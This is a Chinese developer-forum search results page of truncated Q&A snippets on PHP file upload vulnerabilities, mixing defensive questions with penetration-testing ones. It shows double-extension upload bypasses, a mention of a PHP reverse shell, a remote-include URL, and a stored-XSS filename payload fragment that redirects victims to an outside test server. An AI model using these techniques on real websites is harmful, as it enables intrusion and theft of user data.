腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
2
回答
在易受攻击的服务器上执行
上传
的
php
脚本,如果我知道它的位置?
、
、
我需要测试一个网站,我发现一个脆弱的
文件
上传
。只检查
文件
扩展名是.jpg、.png还是.pdf。我可以通过
上传
一个名为script.
php
.jpg的
文件
来绕过这个问题。我知道
上传
的
文件
存储在/uploads中。 我怎样才能执行那个脚本?在浏览器中键入http://example.com/uploads/script.
php
.jpg时,脚本不会执行。我知道服务器可以执行
php</
浏览 0
提问于2018-06-24
得票数 1
2
回答
从主题
文件
中获取数据库凭据
、
我让他通过FTP访问主题
文件
夹。他将phpMiniAdmin
上传
到该
文件
夹,并以某种方式获得了数据库凭据,然后他将其用于登录。 他是如何获得这些证书的?一旦您可以将
文件
上载到服务器,是否存在可使用的
漏洞
?
浏览 0
提问于2018-12-30
得票数 2
回答已采纳
5
回答
用
php
编辑
文件
的所有方法?(安全)
、
、
、
、
我的网站有一些严重的安全
漏洞
。在保护the服务器之后,我现在将保护我的
php
文件
。 因此,我想知道由于我的
php
脚本中的
漏洞
,所有的方法都可能被用来
上传
或编辑
php
文件
。
浏览 1
提问于2011-03-13
得票数 1
回答已采纳
2
回答
不受限制的
文件
上传
-可能的攻击
、
、
、
在IIS服务器+ MYSQL上进行渗透测试(练习)期间,我发现了一个不受限制的
文件
上载
漏洞
,我可以为此上载.
php
文件
。因此,我尝试使用passthru或exec命令
上传
php
,但我收到了著名的响应“无法分叉.”因为,据我所知,我
上传
文件
的
文件
夹具有某种安全保护,避免命令的执行。尽管如此,我还是
上传
了一个.
php
文件
,以便使用fopen、fread等命令读取示例
文件</em
浏览 0
提问于2013-12-18
得票数 3
1
回答
WordPress插件上载默认值为777权限
、
、
、
我目前在nginx/1.2.6上使用
PHP
3.5,在我的WordPress上安装了
PHP
服务器。我注意到一个主要的安全问题,每当我
上传
一个wordpress插件时,它会默认所有的目录和
文件
都是777权限。这意味着我需要手动更正这些
文件
权限。
浏览 1
提问于2013-01-07
得票数 0
回答已采纳
3
回答
不使用/利用
文件
名中的XSS
、
、
我试图利用
文件
上传
的
文件
名字段中的
漏洞
进行攻击。web应用程序无法正确验证
上传
文件
的
文件
名,因此存在存储的跨站点脚本
漏洞
。我的问题是,每当我试图重命名
文件
以包含类似于下面的有效负载时,我就不能在
文件
名中包括/。 document.location='http://my_test_server.com/bla.
php
?甚至有可能利用这个
漏洞</
浏览 0
提问于2018-04-19
得票数 2
回答已采纳
2
回答
在
PHP
上传
脚本中限制哪些
文件
?
、
、
、
、
我用
PHP
写了一个简单的
上传
脚本,允许用户
上传
文件
。在他们的
上传
文件
夹中,我放置了一个.htaccess
文件
,其中包含一行:显然,我会限制用户
上传
.htaccess和
php
.ini。我不想限制更多的
文件
超过必要的,并且.
php
文件
应该防止恶意htaccess
文件
或JavaScript。我还需要限制哪些
文件
才能100%
浏览 0
提问于2016-03-02
得票数 0
1
回答
最后带有特殊字符的
PHP
执行
、
、
我试图复制这个
漏洞
: 根据解释,可以绕过Wordpress插件中的检查,在
php
扩展后添加一个特殊的char。我正在尝试攻击,
文件
上传
时名为shell.
php
<special_char>,包含一个简单的
php
代码<?
php
echo "poc"; ?>。 然后,我应该在<target>
浏览 0
提问于2020-12-22
得票数 1
1
回答
Nginx - Wordpress只
上传
图像规则
我是否可以在nginx config中添加一条规则,允许用户只
上传
带有".jpg“扩展名的图片? 我知道黑客可能会在映像中执行
php
代码,但至少这是一个很好的安全措施。
浏览 0
提问于2016-09-16
得票数 0
1
回答
来自XSS的LFI还是RFI?
、
、
XSS能引导我们找到本地
文件
包含还是远程
文件
包含?我读过一篇文章,它可以通过XSS
漏洞
上传
shell,但我仍然不知道它是如何实现的。
浏览 0
提问于2012-06-06
得票数 1
回答已采纳
2
回答
文件
上传
(哪种类型的
文件
)
、
、
、
当我学习关于
文件
上传
漏洞
的时候,一个问题浮现在我的脑海中。在搜索
文件
上载
漏洞
时使用哪种类型的
文件
?是否需要检测后端使用哪种编程语言?大多数示例中都使用
Php
扩展名
文件
。
浏览 0
提问于2022-05-17
得票数 1
1
回答
PHP
包括-注入可能吗?
、
、
最近我的服务器被黑了,
文件
被
上传
了。现在,我正在试图定位薄弱点,这使我进入了
php
注入。我使用以下代码来包含
文件
:}http://badsite.com/badcode.
php
浏览 1
提问于2018-09-30
得票数 1
回答已采纳
1
回答
如何使
文件
只能下载,而不能被客户端读取
、
、
我正在编写一个
php
脚本,用户可以
上传
任何类型的
文件
,甚至是
php
文件
。我希望这些
文件
只能由用户客户端(浏览器)下载。比如Dropbox。
浏览 0
提问于2017-01-12
得票数 0
1
回答
如何利用jpg
文件
中的RCE?
、
、
我正在学习如何使用JPG和PNG
文件
获取RCE。下面是我
上传
文件
的代码。它将检查
文件
内容类型是否正确。
浏览 0
提问于2018-08-03
得票数 0
2
回答
黑客
上传
文件
到FTP -这是什么类型的黑客?
、
、
如果这真的不是一个合适的问题,我很抱歉,但这种情况在我身上发生了很多次,我不知道发生了什么,因为我的网站上没有
上传
表格。不知何故,有人
上传
了很多
PHP
文件
到我的FTP服务器上。这些
文件
甚至通过Google Analytics获得了流量。我有一个联系人表单,它确实需要加强安全性,但黑客可以通过它
上传
文件
和更改我的.htaccess
文件
吗? 这是什么类型的黑客攻击?
浏览 0
提问于2011-10-04
得票数 0
回答已采纳
1
回答
是否需要对公共方法使用身份验证检查?
、
、
、
在面向对象的
PHP
应用程序中,为了安全起见,我是否需要在应用程序中的几乎所有public方法中使用public签入?即使我使用static 关键字?就像另一个
漏洞
--比如允许
PHP
文件
上传
到我的系统?
浏览 5
提问于2011-06-30
得票数 1
回答已采纳
1
回答
如何绕过jQuery验证
、
、
、
}); } FormFileUpload.init(); 有什么办法可以绕过它们吗?我要在我的website.So上添加这个脚本,任何人都可以绕过它们,这对我的网站来说是强制性的。
浏览 4
提问于2017-05-24
得票数 0
1
回答
帮助理解
PHP
反向Shells
、
我不得不将脚本从shell.
php
重命名为shell.
php
.png,因为该站点只允许我
上传
图片。再次,我获得了登录访问网站的
上传
页面。我尝试
上传
相同的反向shell脚本,但在设置netcat侦听器后无法访问。最终,我要做的是
上传
一个
php
后门脚本:然后,我不得不利用index.
ph
浏览 0
提问于2020-06-20
得票数 1
2
回答
上传
文件
到系统的安全问题
、
、
=1的其他部分存在安全
漏洞
。我假设正在
上传
的
文件
本身可能是一些恶意的可执行
文件
,并且没有被检查?如果是这样的话,有没有办法阻止
上传
可执行
文件
,或者只是
上传
.doc
文件
(看起来这就是程序想要的
文件
)?
浏览 2
提问于2012-10-22
得票数 0
回答已采纳
4
回答
使用
PHP
获取原始
文件
扩展名
我有一个
文件
abc.xls,我需要
上传
一个.csv
文件
,我重命名该
文件
并
上传
它,以绕过扩展名验证,这是我的系统的一个
漏洞
,有没有办法在创建时使用
PHP
来查找原始
文件
扩展名或
文件
扩展名?
浏览 0
提问于2014-02-13
得票数 0
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
PHP 文件上传
php大文件上传
PHP任意文件上传漏洞CVE-2015-2348浅析
文件上传漏洞
PHP文件该怎么上传……
热门
标签
更多标签
云服务器
ICP备案
对象存储
腾讯会议
实时音视频
活动推荐
运营活动
广告
关闭
领券